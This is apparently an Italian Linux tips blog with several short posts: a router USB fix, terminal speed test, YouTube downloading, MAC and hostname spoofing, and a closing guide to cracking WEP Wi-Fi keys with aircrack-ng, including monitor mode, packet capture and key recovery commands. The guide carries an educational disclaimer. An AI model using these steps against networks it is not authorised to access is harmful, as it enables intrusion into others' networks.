Asus DSL-N55U: problema hard disk e chiavette USB inaccessibili o non rilevati

Da oltre un anno posseggo il router Asus DSL-N55U.

Evito di dare una valutazione generale del router, dico solo che a mio modesto parere le prestazioni generali e l’affidabilità non valgono la spesa, almeno non se usato con il firmware ufficiale.

Voglio solo dare un consiglio riguardo al problema degli hard disk e chiavette USB che puntualmente dopo un po che sono collegati al router risultano inaccessibili.

Considerando che avevo deciso l’acquisto con in mente un utilizzo tipo “NAS dei poveri”, viste le due porte USB e i client P2P (torrent,eMule,Usenet) integrati, non mi pare un limite da poco.

Ebbene (sgrat sgrat) la soluzione sembra essere il tipo di filesystem con cui formattiamo gli hard disk/chiavette: a me funziona solo con ext2.

Utente avvisato…

Annunci

Testare le prestazioni della linea internet da terminale

$ wget -O speedtest-cli https://raw.github.com/sivel/speedtest-cli/master/speedtest_cli.py
$ chmod +x speedtest-cli
$ ./speedtest-cli
Retrieving speedtest.net configuration…
Retrieving speedtest.net server list…
Testing from Comcast Cable (x.x.x.x)…
Selecting best server based on ping…
Hosted by FiberCloud, Inc (Seattle, WA) [12.03 km]: 44.028 ms
Testing download speed………………………………….
Download: 32.29 Mbit/s
Testing upload speed…………………………………………..
Upload: 5.18 Mbit/s

http://askubuntu.com/questions/104755/how-to-check-internet-speed-via-terminal

Scaricare video da Youtube su Linux, Windows e Mac OS X senza installare software

Per scaricare i video di Youtube su qualsiasi piattaforma e senza dover installare nulla* è sufficiente sostituire nella barra degli indirizzi del browser

youtube

con

voobys

Ad esempio

http://www.youtube.com/watch?v=ePOQrz2SZcA

diventa

http://www.voobys.com/watch?v=ePOQrz2SZcA

Una volta premuto invio per caricare l’url modificato si apre la pagina web di Voobys e dobbiamo confermare l’avvio dell’applet java, poi sara’ sufficiente cliccare su Download.

Rinominando il file in .flv possiamo poi convertirlo in altri formati oppure estrarne l’audio. Per quest’ultima operazione su Ubuntu Linux basta installare il programma

ffmpeg

con il solito

sudo apt-get install ffmpeg

Estraiamo l’audio in formato mp3

ffmpeg -i file_scaricato_da_youtube.flv audio_estratto_dal_file_scaricato_da_youtube.mp3

Per le altre numerose opzioni di ffmpeg consultare il manuale del programma digitando nel terminale

man ffmpeg

*richiede Java

Accorgimenti extra per navigare anonimi

Se avete letto la mini guida su come navigare anonimi con Tor potreste essere interessati a un paio di accorgimenti ulteriori per aumentare il livello di privacy quando navigate in Internet.

1) Cambiare l’indirizzo MAC della scheda:

sudo ifconfig eth0 down hw ether 00:00:00:00:00:00

(al posto degli zeri inserire dei valori fittizi)

Infine riattivare la scheda con:

sudo ifconfig eth0 up

2) Cambiare il nome del pc:

Per visualizzare il nome attuale del computer:

hostname

Per cambiare il nome del computer:

sudo hostname nuovo_nome

Entrambe queste modifiche vengono annullate automaticamente al riavvio del pc.

Guida rapida al wireless cracking (WEP)

***
Note: La presente guida è pubblicata esclusivamente a scopo didattico. Collegarsi a reti wireless senza l’autorizzazione del proprietario costituisce reato punibile penalmente. Il WEP è stato dichiarato non sicuro da anni, la sua diffusione attuale è molto limitata. Se la vostra rete wireless è cifrata utilizzando il WEP dovreste immediatamente proteggervi utilizzando la cifratura WPA o WPA2. Gli output del terminale sono stati in alcuni casi semplificati rimuovendo informazioni non rilevanti allo scopo di migliorare leggibilita’ e comprensione della guida.
***

Guida rapida al wireless cracking (WEP) – Prima parte

Per craccare una rete wireless con cifratura WEP sono sufficienti un pc dotato di scheda di rete Wi-Fi e un programma di nome aircrack-ng (ng sta per New Generation, essendo questa una versione aggiornata e piu’ evoluta di aircrack).

1) Installare aircrack-ng:

sudo apt-get install aircrack-ng

2) Avviare la modalita’ di monitoraggio (monitor mode):
Prima occorre disabilitare la scheda wireless:

sudo airmon-ng stop wlan0

Poi va riavviata in monitor mode:

sudo airmon-ng start wlan0

Nell’esempio il nome della scheda di rete è wlan0. Su un pc dotato di una scheda ethernet piu’ una wireless solitamente il nome è wlan0. Per trovare il nome della scheda di rete digitare da terminale il seguente comando:

ifconfig -a

Ecco l’output:

$ ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:00:00:00:00:00
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:22937 errors:0 dropped:0 overruns:0 frame:0
TX packets:19393 errors:0 dropped:0 overruns:0 carrier:1
collisions:0 txqueuelen:1000
RX bytes:22963442 (22.9 MB)  TX bytes:2411958 (2.4 MB)

wlan0     Link encap:Ethernet  HWaddr 00:00:00:00:00:00
UP BROADCAST MULTICAST  MTU:1500  Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

3) Visualizziamo le reti wireless intorno a noi con il comando:

sudo airodump-ng wlan0

Come si vede ci sono due reti, una con cifratura WPA mentre l’altra usa il WEP. I dati interessanti ai fini di questa guida sono:

* il campo BSSID, che mostra gli indirizzi MAC dei router/ap

* CH che è il canale di trasmissione

* ESSID che è il nome della rete wireless

Individuata la rete da attaccare, possiamo metterci all’opera iniziando a sniffare i pacchetti con:

sudo airodump-ng -c x –bssid xx:xx:xx:xx:xx:xx -w dump wlan0

Inserire al posto delle x i valori corretti di canale (CH) e BSSID.
Una volta sniffato un numero sufficiente di pacchetti, lanciare aircrack-ng sul file .cap generato nella home utente da airodump-ng:

sudo aircrack-ng -b xx:xx:xx:xx:xx:xx dump-01.cap

Ed ecco la chiave in formato HEX.